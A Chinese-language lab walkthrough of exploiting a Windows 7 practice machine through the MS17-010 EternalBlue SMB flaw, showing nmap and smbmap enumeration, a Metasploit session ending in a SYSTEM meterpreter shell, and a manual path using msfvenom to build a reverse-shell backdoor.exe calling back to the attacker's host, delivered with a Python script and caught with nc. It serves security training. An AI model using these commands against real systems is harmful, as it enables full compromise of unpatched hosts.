本文已参与「新人创作礼」活动,一起开启掘金创作之路
ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限
勘探
常规操作
先用nmap扫
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.40
Host is up (0.021s latency).
Not shown: 65517 closed ports
PORTSTATESERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
oxdf@parrot$ nmap -p 135,139,445 -sCV -oA scans/nmap-tcpscripts 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:01 EDT
Nmap scan report for 10.10.10.40
Host is up (0.018s latency).
PORTSTATE SERVICEVERSION
135/tcp openmsrpcMicrosoft Windows RPC
139/tcp opennetbios-ssnMicrosoft Windows netbios-ssn
445/tcp openmicrosoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -17m06s, deviation: 34m38s, median: 2m53s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_System time: 2021-05-04T02:04:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_Message signing enabled but not required
| smb2-time:
| date: 2021-05-04T01:04:52
|_start_date: 2021-05-04T00:54:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds
扫描之后发现开了135,139,445端口,经过445端口发现系统是win7sp1 7601
典型的永恒之蓝ms17-010漏洞
之后我们可以用之前在nmap使用篇中提及的vuln模式来扫描一下靶机,这个模式可以直接扫描出可以利用的ms漏洞
nmap -p 445 --script vuln 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:17 EDT
Nmap scan report for 10.10.10.40
Host is up (0.019s latency).
PORTSTATE SERVICE
445/tcp openmicrosoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
|servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds
445smb
使用smbmap勘探一下
smbmap -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
oxdf@parrot$ smbmap -H 10.10.10.40 -u "0xdf“ -p ”0xdf“
[+] Guest session IP: 10.10.10.40:445 Name: 10.10.10.40 DiskPermissions Comment--------------- -------ADMIN$NO ACCESS Remote AdminC$NO ACCESS Default shareIPC$NO ACCESS Remote IPCShare READ ONLYUsers READ ONLY
可以看到有两个文件夹可以访问
smbclient //10.10.10.40/share
smbclient //10.10.10.40/users
然后发现这两个文件夹都是空文件夹
获取system权限
由于确定了是ms17-010漏洞,那么就省了提权的麻烦,直接就能获得system权限,那么这里演示手动和msf两种方法
msf
msf6 > search ms17-010
Matching Modules
================ #Name Disclosure DateRank CheckDescription ----- ------------------- ---------------- 0exploit/windows/smb/ms17_010_eternalblue 2017-03-14 averageYesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1exploit/windows/smb/ms17_010_eternalblue_win82017-03-14 averageNo MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 2exploit/windows/smb/ms17_010_psexec2017-03-14 normal YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 3auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 4auxiliary/scanner/smb/smb_ms17_010normal No MS17-010 SMB RCE Detection 5exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 greatYesSMB DOUBLEPULSAR Remote Code Execution
发现3和4一个探测一个命令执行,1是win8,5利用后门,那么依次尝试0和2,我用2成功了,但是没留过程这里用0xdf的0的过程
首先使用0号exp
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current SettingRequiredDescription ---- ---------------------------------- RHOSTS 10.10.10.40yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT445yes The target port (TCP) SMBDomain.no(Optional) The Windows domain to use for authentication SMBPass no(Optional) The password for the specified username SMBUser no(Optional) The username to authenticate as VERIFY_ARCHtrue yes Check if remote architecture matches exploit Target. VERIFY_TARGETtrue yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp): NameCurrent SettingRequiredDescription -------------------------------------- EXITFUNCthread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.14yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target: IdName ------ 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.14:4444
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x0000000057 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73Windows 7 Profes
[*] 10.10.10.40:445 - 0x0000001073 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76sional 7601 Serv
[*] 10.10.10.40:445 - 0x0000002069 63 65 20 50 61 63 6b 20 31ice Pack 1[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.40:49173) at 2021-05-03 21:32:51 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
可能需要多尝试几次,我尝试了三四次才成功
手动
使用一个python脚本GitHub - helviojunior/MS17-010: MS17-010
这个脚本我就利用那个send_and_execute.py这个脚本来上传我们的回连脚本
msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe
这样创建一个
python send_and_execute.py 10.10.10.40 backdoor.exe
然后用python执行
最后打开nc监听就好
nc -lvnp 4444